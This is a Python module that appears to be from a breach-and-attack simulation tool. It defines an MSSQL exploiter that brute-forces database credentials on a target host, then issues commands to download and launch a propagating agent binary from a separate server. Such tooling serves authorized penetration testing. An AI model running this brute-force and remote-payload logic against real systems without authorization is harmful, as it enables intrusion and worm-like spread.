import logging
from typing import Iterable, Sequence, Set

from common.credentials import Credentials
from common.types import AgentID, Event, NetworkPort
from infection_monkey.exploit import (
    IAgentOTPProvider,
    IHTTPAgentBinaryServerRegistrar,
    ReservationID,
    use_agent_binary,
)
from infection_monkey.exploit.tools.helpers import get_agent_dst_path
from infection_monkey.i_puppet import ExploiterResult, TargetHost
from infection_monkey.utils.threading import interruptible_iter

from .mssql_client import MSSQLClient
from .mssql_command_builder import (
    build_mssql_agent_download_command,
    build_mssql_agent_launch_command,
)
from .mssql_options import MSSQLOptions

logger = logging.getLogger(__name__)


class MSSQLExploiter:
    def __init__(
        self,
        agent_id: AgentID,
        mssql_exploit_client: MSSQLClient,
        http_agent_binary_server_registrar: IHTTPAgentBinaryServerRegistrar,
        otp_provider: IAgentOTPProvider,
    ):
        self._agent_id = agent_id
        self._mssql_exploit_client = mssql_exploit_client
        self._http_agent_binary_server_registrar = http_agent_binary_server_registrar
        self._otp_provider = otp_provider

    def exploit_host(
        self,
        target_host: TargetHost,
        options: MSSQLOptions,
        servers: Sequence[str],
        current_depth: int,
        brute_force_credentials: Sequence[Credentials],
        ports_to_try: Set[NetworkPort],
        interrupt: Event,
    ) -> ExploiterResult:
        logger.info(f"Starting MSSQL exploiter for host: {target_host.ip}")

        agent_destination_path = get_agent_dst_path(target_host)
        try:
            logger.debug("Registering a request for an Agent binary")
            download_ticket = self._http_agent_binary_server_registrar.reserve_download(
                target_host.operating_system,
                target_host.ip,
                use_agent_binary,
            )
        except Exception as err:
            msg = (
                "An unexpected exception occurred while attempting to register a request "
                f"for an agent binary: {err} "
            )
            logger.exception(msg)
            return ExploiterResult(error_message=msg)

        download_agent_command = build_mssql_agent_download_command(
            download_ticket.download_url, agent_destination_path
        )

        launch_agent_command = build_mssql_agent_launch_command(
            self._agent_id, servers, current_depth, agent_destination_path, self._otp_provider
        )

        try:
            return self._brute_force_exploit_host(
                target_host,
                options,
                brute_force_credentials,
                download_agent_command,
                launch_agent_command,
                download_ticket.download_completed,
                ports_to_try,
                interrupt,
            )
        except Exception as err:
            msg = (
                "An unexpected exception occurred while "
                f"exploiting host {target_host} with MSSQL: {err}"
            )
            logger.exception(msg)
            return ExploiterResult(
                exploitation_success=False, propagation_success=False, error_message=msg
            )
        finally:
            _clear_agent_binary_reservation(
                download_ticket.id, self._http_agent_binary_server_registrar
            )

    def _brute_force_exploit_host(
        self,
        target_host: TargetHost,
        options: MSSQLOptions,
        brute_force_credentials_combinations: Sequence[Credentials],
        download_agent_command: str,
        launch_agent_command: str,
        agent_binary_downloaded: Event,
        ports_to_try: Iterable[NetworkPort],
        interrupt: Event,
    ):
        exploit_result = ExploiterResult(exploitation_success=False, propagation_success=False)

        for propagation_credentials in interruptible_iter(
            brute_force_credentials_combinations, interrupt, "MSSQL exploiter has been interrupted"
        ):
            (
                exploit_result.exploitation_success,
                exploit_result.propagation_success,
            ) = self._mssql_exploit_client.exploit_host(
                target_host,
                options,
                propagation_credentials,
                download_agent_command,
                launch_agent_command,
                agent_binary_downloaded,
                ports_to_try,
            )

            if exploit_result.exploitation_success:
                break

        return exploit_result


def _clear_agent_binary_reservation(
    reservation_id: ReservationID,
    http_agent_binary_server_registrar: IHTTPAgentBinaryServerRegistrar,
):
    try:
        logger.debug(f"Deregister agent binary request with id: {reservation_id}")
        http_agent_binary_server_registrar.clear_reservation(reservation_id)
    except Exception:
        logger.exception("An unexpected error occurred while deregistering agent binary request")
